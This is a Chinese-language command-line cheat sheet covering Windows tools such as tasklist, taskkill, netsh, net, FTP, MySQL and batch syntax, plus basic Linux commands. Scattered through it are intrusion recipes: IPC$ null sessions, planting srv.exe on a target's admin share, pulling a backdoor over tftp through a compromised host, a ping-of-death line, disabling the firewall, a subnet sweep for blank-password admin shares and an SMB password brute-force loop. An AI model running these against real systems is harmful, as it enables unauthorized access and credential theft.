tasklist 顯示 "本地" 或 "遠端" 機器上目前運作的程序清單。
使用 tasklist 指令檢視遠端系統的程序時,需要遠端機器的 RPC 伺服器的支援,否則,該指令就不能正常使用。
通過 "任務管理器 (快捷鍵 Ctrl+Alt+Del)" 可以檢視到本機完整的程序清單,而且可以通過手工定制程序清單的方式獲的更多的程序資訊,如會話ID、使用者名等,但是,看不到程序到底提供了哪些系統服務。而 tasklist 就可以。"tasklist、taskkill" 是在 Windows XP 中新增了兩個指令行工具。
指令、參數 大小寫都可以,效果一樣。
tasklist [/S system [/U username [/P [password]]]]
[/M [module] | /SVC | /V] [/FI filter] [/FO format] [/NH]
參數清單:
/S system 指定要連接配接的遠端系統。
/U [domain\]user 指定使用者名。
/P [password] 指定密碼。如果省略,則提示輸入。
/M [module] 列出調用所指定 dll 的所有 程序 (任務) 。
如果沒有指定子產品名稱,顯示所有加載的子產品。
/SVC 顯示每個程序提供的服務。
/V 顯示詳細資訊。
/FI filter 顯示符合過濾條件的 程序 (任務) 。
/FO format 設定輸出格式。有效值: "TABLE"、"LIST"、"CSV"。
/NH 設定不顯的列标題。隻對 "TABLE" 和 "CSV" 格式有效。
/? 顯示幫助消息。
filter:
filter名 有效操作符 有效值
----------- --------------- --------------------------
STATUS eq, ne RUNNING | NOT RESPONDING | UNKNOWN
IMAGENAME eq, ne 映像名稱
PID eq, ne, gt, lt, ge, le PID 值
SESSION eq, ne, gt, lt, ge, le 會話編号
SESSIONNAME eq, ne 會話名
CPUTIME eq, ne, gt, lt, ge, le CPU 時間,格式為:
hh:mm:ss。hh - 時,mm - 分,ss - 秒
MEMUSAGE eq, ne, gt, lt, ge, le 記憶體使用量,機關為 KB
USERNAME eq, ne 使用者名,格式為 [domain\]user
SERVICES eq, ne 服務名稱
WINDOWTITLE eq, ne 視窗标題
MODULES eq, ne DLL 名稱
說明: 當查詢遠端機器時,不支援 "WINDOWTITLE" 和 "STATUS" 過濾器。
示例:
tasklist
tasklist /M
tasklist /V /FO CSV
tasklist /SVC /FO LIST
tasklist /M wbem*
tasklist /S system /FO LIST
tasklist /S system /U domain\username /FO CSV /NH
tasklist /S system /U username /P password /FO TABLE /NH
tasklist /FI "USERNAME ne NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
示例:
1. 檢視本機所有程序
示例:tasklist
2. 檢視遠端系統的程序(遠端系統必須開啟RPC服務)
示例:tasklist /s 218.22.123.26 /u 使用者名 /p 密碼
3. 檢視程序提供的服務
示例:tasklist /svc
示例:tasklist /s 218.22.123.26 /u 使用者名 /p 密碼 /svc
4. 檢視調用DLL子產品檔案的程序清單
檢視本地系統中哪些程序調用了 "shell32.dll" DLL子產品檔案
示例:tasklist /m shell32.dll
5. 使用 過濾器 查找指定的程序
列出系統中正在運作的非 SYSTEM 狀态的所有程序。
示例:tasklist /fi "USERNAME ne NT AUTHORITY\SYSTEM" /fi "STATUS eq running"
6. taskkill 殺死程序
示例:taskkill /pid 要結束的pid
示例:taskkill /im notepad.exe
taskkill
taskkill 按照程序 ID (PID) 或映像名稱終止任務。
taskkill [/S system [/U username [/P [password]]]]
{ [/FI filter] [/PID processid | /IM imagename] } [/T] [/F]
參數清單:
/S system 指定要連接配接的遠端系統。
/U [domain\]user 指定使用者名。
/P [password] 指定密碼。如果省略,則提示輸入。
/FI filter 符合過濾條件的 程序 (任務) 。
允許使用 "*"。例如,映像名稱 eq acme*
/PID processid 指定要終止的程序的 PID。使用 TaskList 取得 PID。
/IM imagename 指定要終止的程序的映像名稱。
通配符 '*'可用來指定所有任務或映像名稱。
/T 終止指定的程序和由它啟用的子程序。
/F 指定強制終止程序。
/? 顯示幫助消息。
filter:
filter 名 有效運算符 有效值
----------- --------------- -------------------------
STATUS eq, ne RUNNING | NOT RESPONDING | UNKNOWN
IMAGENAME eq, ne 映像名稱
PID eq, ne, gt, lt, ge, le PID 值
SESSION eq, ne, gt, lt, ge, le 會話編号。
CPUTIME eq, ne, gt, lt, ge, le CPU 時間,格式為:
hh:mm:ss。 hh - 時,mm - 分,ss - 秒
MEMUSAGE eq, ne, gt, lt, ge, le 記憶體使用量,機關為 KB
USERNAME eq, ne 使用者名,格式為 [domain\]user
MODULES eq, ne DLL 名稱
SERVICES eq, ne 服務名稱
WINDOWTITLE eq, ne 視窗标題
說明
1) 隻有在使用 過濾器 的情況下,/IM 切換才能使用通配符 '*'。
2) 遠端程序總是要強行 (/F) 終止。
3) 當指定遠端機器時,不支援 "WINDOWTITLE" 和 "STATUS" 篩選器。
例如:
taskkill /IM notepad.exe
taskkill /PID 1230 /PID 1241 /PID 1253 /T
taskkill /F /IM cmd.exe /T
taskkill /F /FI "PID ge 1000" /FI "WINDOWTITLE ne untitle*"
taskkill /F /FI "USERNAME eq NT AUTHORITY\SYSTEM" /IM notepad.exe
taskkill /S system /U domain\username /FI "USERNAME ne NT*" /IM *
taskkill /S system /U username /P password /FI "IMAGENAME eq note*"
基本的用法就是:taskkill /pid ****(pid号)
至于eq,ne,ge,le,gt,lt,是等于,不等于,不小于,不大于,大于,小于意思,主要是用來終止一組程序的,不過這個參數可以通過多組taskkill 來實作。
/F是強制指令。
netsh --- 網絡配置 工具集合
Netsh 是指令行腳本實用工具,可讓你顯示或修改目前正在運作的計算機的網絡配置。 可以通過在 netsh 提示符下鍵入指令來運作 Netsh 指令,并且可以在批處理檔案或腳本中使用 Netsh 指令。 可以使用 netsh 指令來配置遠端計算機和本地計算機。
Netsh 還提供腳本功能,可讓你在批處理模式下對指定的計算機運作一組指令。 你可以使用 Netsh 将配置腳本儲存在文本檔案中,以便存檔或者幫助你配置其他計算機。
知道有哪些可選功能後,就可以進一步輸入二級指令,執行要進行的操作。
比如下邊檢視目前 tcp 連結狀态位列展示:
導出導入腳本
netsh -c interface ip dump > c:/interface.txt
netsh -f c:/interface.txt
固定 IP 位址批處理
//SETIPDNS.bat( “本地連接配接”換成你網卡的名字, 具體的 ip 位址,網關,請自行修改 )
@echo off
echo 正在修改本機IP...
netsh interface ip set address name="本地連接配接" source=static 192.168.1.188 255.255.255.0 192.168.1.1 1
echo 正在添加本機主DNS...
netsh interface ip set dns "本地連接配接" static 18.0.0.10 primary
echo 正在添加本機副DNS...
netsh interface ip add dns "本地連接配接" 18.0.0.10
echo 設定完成...
echo 檢查目前本機配置...
ipconfig /all
echo 導出配置腳本...
netsh -c interface ip dump
pause
自動擷取 IP
@echo off
echo 正在修改本機IP...
netsh interface ip set address name="本地連接配接" source=dhcp
echo 正在添加本機主DNS...
netsh interface ip set dns "本地連接配接" dhcp
echo 設定完成...
echo 檢查目前本機配置...
ipconfig /all
echo 導出配置腳本...
netsh -c interface ip dump
pause
檢視網絡配置
netsh interface ip show {選項}
{選項}可以是:
address-顯示IP位址配置。
config-顯示IP位址和更多資訊。
dns-顯示DNS伺服器位址。
icmp-顯示ICMP統計。
interface-顯示IP接口統計。
ipaddress-顯示目前IP位址。
ipnet-顯示IP的網絡到媒體的映射。
ipstats-顯示IP統計。
joins-顯示加入的多點傳播組。
offload-顯示解除安裝資訊。
tcpconn-顯示TCP連接配接。
tcpstats-顯示TCP統計。
udpconn-顯示UDP連接配接。
udpstats-顯示UDP統計。
wins-顯示WINS伺服器位址。
配置 接口IP/網關IP
netsh interface ip set address "本地連接配接" static 10.1.2.90 255.255.255.0 10.1.2.254 1
配置自動換取IP位址,DNS位址及wins位址
netsh interface ip set address "本地連接配接" dhcp
netsh interface ip set dns "本地連接配接" dhcp
netsh interface ip set wins "本地連接配接" dhcp
配置靜态IP位址,DNS位址及wins位址
netsh interface ip set address "本地連接配接" static 10.1.2.90
netsh interface ip set dns "本地連接配接" static 202.99.160.68
netsh interface ip set wins "本地連接配接" static 10.1.2.200
檢視 網絡配置 檔案
C:>netsh -c interface dump
導出 網絡配置 檔案
netsh -c interface dump > d:/1.txt
導入 網絡配置 檔案
netsh -f d:/1.txt
netsh exec d:/2.txt
netsh 配置防 火牆
檢視、開啟或禁用系統防火牆
# 檢視防火牆的狀态
netsh firewall show state
# 禁用系統防火牆
netsh firewall set opmode disable
# 啟用防火牆
netsh firewall set opmode enable
DOS 指令集
net 相關指令
net use \\ip\ipc$ " " /user:" " 建立IPC空連結
net use \\ip\ipc$ "密碼" /user:"使用者名" 建立IPC非空連結
net use h: \\ip\c$ "密碼" /user:"使用者名" 直接登陸後映射對方C:到本地為H:
net use h: \\ip\c$ 登陸後映射對方C:到本地為H:
net use \\ip\ipc$ /del 删除IPC連結
net use h: /del 删除映射對方到本地的為H:的映射
net user 使用者名 密碼 /add 建立使用者
net user guest /active:yes 激活guest使用者
net user 檢視有哪些使用者
net user 帳戶名 檢視帳戶的屬性
net localgroup ***istrators 使用者名 /add 把“使用者”添加到管理者中使其具有管理者權限,注意:***istrator後加s用複數
net start 檢視開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schedule)
net stop 服務名 停止某服務
net time \\目标ip 檢視對方時間
net time \\目标ip /set 設定本地計算機時間與“目标IP”主機的時間同步,加上參數/yes可取消确認資訊
net view 檢視本地區域網路内開啟了哪些共享
net view \\ip 檢視對方區域網路内開啟了哪些共享
net config 顯示系統網絡設定
net logoff 斷開連接配接的共享
net pause 服務名 暫停某服務
net send ip "文本資訊" 向對方發資訊
net ver 區域網路内正在使用的網絡連接配接類型和資訊
net share 檢視本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest使用者登陸後用将密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 檢視開啟了哪些端口,常用netstat -an
netstat -n 檢視端口的網絡連接配接情況,常用netstat -an
netstat -v 檢視正在進行的工作
netstat -p 協定名 例:netstat -p tcq/ip 檢視某協定使用情況(檢視tcp/ip協定使用情況)
netstat -s 檢視正在使用的所有協定使用情況
nbtstat -A ip 對方136到139其中一個端口開了的話,就可檢視對方最近登陸的使用者名(03前的為使用者名)-注意:參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由(資料包),參數:“-w數字”用于設定逾時間隔。
ping ip(或域名) 向對方主機發送預設大小為32位元組的資料,參數:“-l[空格]資料包大小”;“-n發送資料次數”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大于64K的檔案并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)檢視本地ip位址,ipconfig可用參數“/all”顯示全部配置資訊
tlist -t 以樹行清單顯示程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools檔案夾内)
kill -F 程序名 加-F參數後強制結束某程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools檔案夾内)
del -F 檔案名 加-F參數後就可删除隻讀檔案,/AR、/AH、/AS、/AA分别表示删除隻讀、隐藏、系統、存檔檔案,/A-R、/A-H、/A-S、/A-A表示删除除隻讀、隐藏、系統、存檔以外的檔案。例如“DEL/AR *.*”表示删除目前目錄下所有隻讀檔案,“DEL/A-S *.*”表示删除目前目錄下除系統檔案以外的所有檔案
del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S删除目錄及目錄下的所有子目錄和檔案。同時使用參數/Q 可取消删除操作時的系統确認就直接删除。(二個指令作用相同)
move 盤符\路徑\要移動的檔案名 存放移動檔案的路徑\移動後檔案名 移動檔案,用參數/y将取消确認移動目錄存在相同檔案的提示就直接覆寫
fc one.txt two.txt > 3st.txt 對比二個檔案并把不同之處輸出到3st.txt檔案中,"> "和"> >" 是重定向指令
at id号 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務,用參數/yes則不需要确認就直接停止
at id号 /delete 停止某個已注冊的計劃任務
at 檢視所有的計劃任務
at \\ip time 程式名(或一個指令) /r 在某時間運作對方某程式并重新啟動計算機
finger username @host 檢視最近有哪些使用者登陸
telnet ip 端口 遠和登陸伺服器,預設端口為23
open ip 連接配接到IP(屬telnet登陸後的指令)
telnet 在本機上直接鍵入telnet 将進入本機的telnet
copy 路徑\檔案名1 路徑\檔案名2 /y 複制檔案1到指定的目錄為檔案2,用參數/y就同時取消确認你要改寫一份現存目錄檔案
copy c:\srv.exe \\ip\***$ 複制本地c:\srv.exe到對方的***下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的檔案,注:2st.txt檔案頭要空三排,參數:/b指二進制檔案,/a指ASCLL格式檔案
copy \\ip\***$\svv.exe c:\ 或:copy\\ip\***$\*.* 複制對方***i$共享下的srv.exe檔案(所有檔案)至本地C:
xcopy 要複制的檔案或目錄樹 目标位址\目錄名 複制檔案和目錄樹,用參數/Y将不提示覆寫相同檔案
tftp -i 自己IP(用肉機作跳闆時這用肉機IP) get server.exe c:\server.exe 登陸後,将“IP”的server.exe下載下傳到目标主機c:\server.exe 參數:-i指以二進制模式傳送,如傳送exe檔案時用,如不加-i 則以ASCII模式(傳送文本檔案模式)進行傳送
tftp -i 對方IP put c:\server.exe 登陸後,上傳本地c:\server.exe至主機
ftp ip 端口 用于上傳檔案至伺服器或進行檔案操作,預設端口為21。bin指用二進制方式傳送(可執行檔案進);預設為ASCII格式傳送(文本檔案時)
route print 顯示出IP路由,将主要顯示網絡位址Network addres,子網路遮罩Netmask,網關位址Gateway addres,接口位址Interface
arp 檢視和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個實體性的MAC位址。arp -a将顯示出全部資訊
start 程式名或指令 /max 或/min 新開一個新視窗并最大化(最小化)運作某程式或指令
mem 檢視cpu使用情況
attrib 檔案名(目錄名) 檢視某檔案(目錄)的屬性
attrib 檔案名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某檔案的 存檔,隻讀,系統,隐藏 屬性;用+則是添加為某屬性
dir 檢視檔案,參數:/Q顯示檔案及目錄屬系統哪個使用者,/T:C顯示檔案建立時間,/T:A顯示檔案上次被通路時間,/T:W上次被修改時間
date /t 、 time /t 使用此參數即“DATE/T”、“TIME/T”将隻顯示目前日期和時間,而不必輸入新日期和時間
set 指定環境變量名稱=要指派給變量的字元 設定環境變量
set 顯示目前所有的環境變量
set p(或其它字元) 顯示出目前以字元p(或其它字元)開頭的所有環境變量
pause 暫停批處理程式,并顯示出:請按任意鍵繼續....
if 在批處理程式中執行條件處理(更多說明見if指令及變量)
goto 标簽 将cmd.exe導向到批處理程式中帶标簽的行(标簽必須單獨一行,且以冒号打頭,例如:“:start”标簽)
call 路徑\批處理檔案名 從批處理程式中調用另一個批處理程式 (更多說明見call /?)
for 對一組檔案中的每一個檔案執行某個特定指令(更多說明見for指令及變量)
echo on或off 打開或關閉echo,僅用echo不加參數則顯示目前echo設定
echo 資訊 在螢幕上顯示出資訊
echo 資訊 >> pass.txt 将"資訊"儲存到pass.txt檔案中
findstr "Hello" aa.txt 在aa.txt檔案中尋找字元串hello
find 檔案名 查找某檔案
title 标題名字 更改CMD視窗标題名字
color 顔色值 設定cmd控制台前景和背景顔色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的指令提示符(把C:\、D:\統一改為:EntSky\ )
ver 在DOS視窗下顯示版本資訊
winver 彈出一個視窗顯示版本資訊(記憶體大小、系統版本、更新檔版本、計算機名)
format 盤符 /FS:類型 格式化磁盤,類型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目錄名 建立目錄
replace 源檔案 要替換檔案的目錄 替換檔案
ren 原檔案名 新檔案名 重命名檔案名
tree 以樹形結構顯示出目錄,用參數-f 将列出第個檔案夾中檔案名稱
type 檔案名 顯示文本檔案的内容
more 檔案名 逐屏顯示輸出檔案
doskey 要鎖定的指令=字元
doskey 要解鎖指令= 為DOS提供的鎖定指令(編輯指令行,重新調用win2k指令,并建立宏)。如:鎖定dir指令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁盤D并顯示狀态報告;加參數/f并修複磁盤上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務預設端口23為其它任何端口
exit 退出cmd.exe程式或目前,用參數/B則是退出目前批處理腳本而不是cmd.exe
path 路徑\可執行檔案的檔案名 為可執行檔案設定一個路徑。
cmd 啟動一個win2K指令解釋視窗。參數:/eff、/en 關閉、開啟指令擴充;更我詳細說明見cmd /?
regedit /s 系統資料庫檔案名 導入系統資料庫;參數/S指安靜模式導入,無任何提示;
regedit /e 系統資料庫檔案名 導出系統資料庫
cacls 檔案名 參數 顯示或修改檔案通路控制清單(ACL)——針對NTFS格式時。參數:/D 使用者名:設定拒絕某使用者通路;/P 使用者名:perm 替換指定使用者的通路權限;/G 使用者名:perm 賦予指定使用者通路權限;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub使用者通路。
cacls 檔案名 檢視檔案的通路使用者權限清單
REM 文本内容 在批處理檔案中添加注解
netsh 檢視或更改本地網絡配置情況
IIS 服務 指令
iisreset /reboot 重新開機win2k計算機(但有提示系統将重新開機資訊出現)
iisreset /start或stop 啟動(停止)所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀态
iisreset /enable或disable 在本地系統上啟用(禁用)Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時,若發生錯誤将重新開機
iisreset /noforce 若無法停止Internet服務,将不會強制終止Internet服務
iisreset /timeout Val在到達逾時間(秒)時,仍未停止Internet服務,若指定/rebootonerror參數,則電腦将會重新開機。預設值為重新啟動20秒,停止60秒,重新開機0秒。
FTP 指令: (後面有詳細說明内容)
ftp的指令行格式為:
ftp -v -d -i -n -g[主機名] -v 顯示遠端伺服器的所有響應資訊。
-d 使用調試方式。
-n 限制ftp的自動登入,即不使用.netrc檔案。
-g 取消全局檔案名。
help [指令] 或 ?[指令] 檢視指令說明
bye 或 quit 終止主機FTP程序,并退出FTP管理方式.
pwd 列出目前遠端主機目錄
put 或 send 本地檔案名 [上傳到主機上的檔案名] 将本地一個檔案傳送至遠端主機中
get 或 recv [遠端主機檔案名] [下載下傳到本地後的檔案名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批檔案至本地主機
mput local-files 将本地主機中一批檔案傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出目前遠端主機目錄中的檔案.如果有本地檔案,就将結果寫至本地檔案
ascii 設定以ASCII方式傳送檔案(預設值)
bin 或 image 設定以二進制方式傳送檔案
bell 每完成一次檔案傳送,報警提示
cdup 傳回上一級目錄
close 中斷與遠端伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接配接,可指定連接配接端口
delete 删除遠端主機中的檔案
mdelete [remote-files] 删除一批檔案
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的檔案名
rmdir directory-name 删除遠端主機中的目錄
status 顯示目前FTP的狀态
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以别的使用者名登入遠端主機
open host [port] 重建立立一個新的連接配接
prompt 互動提示模式
macdef 定義宏指令
lcd 改變目前本地主機的工作目錄,如果預設,就轉到目前使用者的HOME目錄
chmod 改變遠端主機的檔案權限
case 當為ON時,用MGET指令拷貝的檔案名到本地機器中,全部轉換為小寫字母
cd remote-dir 進入遠端主機目錄
cdup 進入遠端主機目錄的父目錄
! 在本地機中執行互動shell,exit回到ftp環境,如!ls*.zip
MySQL 指令
mysql -h主機位址 -u使用者名 -p密碼 連接配接MYSQL;如果剛安裝好MYSQL,超級使用者root是沒有密碼的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格,其它也一樣)
exit 退出MYSQL
mysql*** -u使用者名 -p舊密碼 password 新密碼 修改密碼
grant select on 資料庫.* to 使用者名@登入主機 identified by \"密碼\"; 增加新使用者。(注意:和上面不同,下面的因為是MYSQL環境中的指令,是以後面都帶一個分号作為指令結束符)
show databases; 顯示資料庫清單。剛開始時才兩個資料庫:mysql和test。mysql庫很重要它裡面有MYSQL的系統資訊,我們改密碼和新增使用者,實際上就是用這個庫進行操作。
use mysql;
show tables; 顯示庫中的資料表
describe 表名; 顯示資料表的結構
create database 庫名; 建庫
use 庫名;
create table 表名 (字段設定清單); 建表
drop database 庫名;
drop table 表名; 删庫和删表
delete from 表名; 将表中記錄清空
select * from 表名; 顯示表中的記錄
mysqldump --opt school>school.bbb 備份資料庫:(指令在DOS的\\mysql\\bin目錄下執行);注釋:将資料庫school備份到school.bbb檔案,school.bbb是一個文本檔案,檔案名任取,打開看看你會有新發現。
win2003系統下新增指令(實用部份):
shutdown /參數 關閉或重新開機本地或遠端主機。
參數說明:/S 關閉主機,/R 重新開機主機, /T 數字 設定延時的時間,範圍0~180秒之間, /A取消開機,/M //IP 指定的遠端主機。
例:shutdown /r /t 0 立即重新開機本地主機(無延時)
taskill /參數 程序名或程序的pid 終止一個或多個任務和程序。
參數說明:/PID 要終止程序的pid,可用tasklist指令獲得各程序的pid,/IM 要終止的程序的程序名,/F 強制終止程序,/T 終止指定的程序及他所啟動的子程序。
tasklist 顯示目前運作在本地和遠端主機上的程序、服務、服務各程序的程序辨別符(PID)。
參數說明:/M 列出目前程序加載的dll檔案,/SVC 顯示出每個程序對應的服務,無參數時就隻列出目前的程序。
Linux 系統下基本指令: 區分大小寫
uname 顯示版本資訊(同win2K的 ver)
dir 顯示目前目錄檔案,ls -al 顯示包括隐藏檔案(同win2K的 dir)
pwd 查詢目前所在的目錄位置
cd cd ..回到上一層目錄,注意cd 與..之間有空格。cd /傳回到根目錄。
cat 檔案名 檢視檔案内容
cat >abc.txt 往abc.txt檔案中寫上内容。
more 檔案名 以一頁一頁的方式顯示一個文本檔案。
cp 複制檔案
mv 移動檔案
rm 檔案名 删除檔案,rm -a 目錄名删除目錄及子目錄
mkdir 目錄名 建立目錄
rmdir 删除子目錄,目錄内沒有文檔。
chmod 設定檔案或目錄的存取權限
grep 在檔案中查找字元串
diff 檔案檔案比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 檢視自己的帳号名稱
groups 檢視某人的Group
passwd 更改密碼
history 檢視自己下過的指令
ps 顯示程序狀态
kill 停止某程序
gcc 黑客通常用它來編譯C語言寫的檔案
su 權限轉換為指定使用者
telnet IP telnet連接配接對方主機(同win2K),當出現bash$時就說明連接配接成功。
ftp ftp連接配接上某伺服器(同win2K)
if 指令及變量 基本格式:
IF [not] errorlevel 數字 指令語句 如果程式運作最後傳回一個等于或大于指定數字的退出編碼,指定條件為“真”。
例:IF errorlevel 0 指令 指程式執行後傳回的值為0時,就值行後面的指令;IF not errorlevel 1 指令指程式執行最後傳回的值不等于1,就執行後面的指令。
0 指發現并成功執行(真);1 指沒有發現、沒執行(假)。
IF [not] 字元串1==字元串2 指令語句 如果指定的文本字元串比對(即:字元串1 等于 字元串2),就執行後面的指令。
例:“if "%2%"=="4" goto start”指:如果輸入的第二個變量為4時,執行後面的指令(注意:調用變量時就%變量名%并加" ")
IF [not] exist 檔案名 指令語句 如果指定的檔案名存在,就執行後面的指令。
例:“if not nc.exe goto end”指:如果沒有發現nc.exe檔案就跳到":end"标簽處。
IF [not] errorlevel 數字 指令語句 else 指令語句或 IF [not] 字元串1==字元串2 指令語句 else 指令語句或 IF [not] exist 檔案名 指令語句 else 指令語句 加上:else 指令語句後指:目前面的條件不成立時,就指行else後面的指令。注意:else 必須與 if 在同一行才有效。 當有del指令時需把del指令全部内容用< >括起來,因為del指令要單獨一行時才能執行,用上< >後就等于是單獨一行了;例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意指令中的“.”
for 指令及變量 基本格式:
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數,如:%i ,而指定一個變量則用:%%i ,而調用變量時用:%i% ,變量是區分大小寫的(%i 不等于 %I)。
批處理每次能處理的變量從%0—%9共10個,其中%0預設給批處理檔案名使用,%1預設為使用此批處理時輸入的的第一個值,同理:%2—%9指輸入的第2-9個值;例:net use \\ip\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3
(set):指定一個或一組檔案,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一個"1"指起始值,第二個"1"指增長量,第三個"254"指結束值,即:從1到254;“(1 -1 254)”說明:即從254到1 }
command:指定對第個檔案執行的指令,如:net use指令;如要執行多個指令時,指令這間加:& 來隔開
command_parameters:為特定指令指定參數或指令行開關
IN (set):指在(set)中取值;DO command :指執行command
參數:/L 指用增量形式{ (set)為增量形式時 };/F 指從檔案中不斷取值,直到取完為止{ (set)為檔案時,如(d:\pass.txt)時 }。
用法舉例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:***istrator | find "指令成功完成" >>test.txt
存為test.bat 說明:對指定的一個C類網段的254個IP依次試建立***istrator密碼為空的IPC$連接配接,如果成功就把該IP存在test.txt中。
/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*為批處理預設的 %1;%%G 為變量(ip的最後一位);& 用來隔開echo 和net use 這二個指令;| 指建立了ipc$後,在結果中用find檢視是否有"指令成功完成"資訊;%1.%%G 為完整的IP位址;(1 1 254) 指起始值,增長量,結止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為:ok.exe 說明:輸入一個IP後,用字典檔案d:\pass.dic來暴解d:\user.dic中的使用者密碼,直到檔案中值取完為止。%%i為使用者名;%1為輸入的IP位址(預設)。
系統外部指令
:https://www.w3cschool.cn/dosmlxxsc1/jiszug.html
使用系統外部指令時,均需下載下傳相關工具
1、瑞士軍刀:nc.exe
2、掃錨工具:xscan.exe
3、指令行方式嗅探器: xsniff.exe:可捕獲區域網路内FTP/SMTP/POP3/HTTP協定密碼
4、終端服務密碼破解: tscrack.exe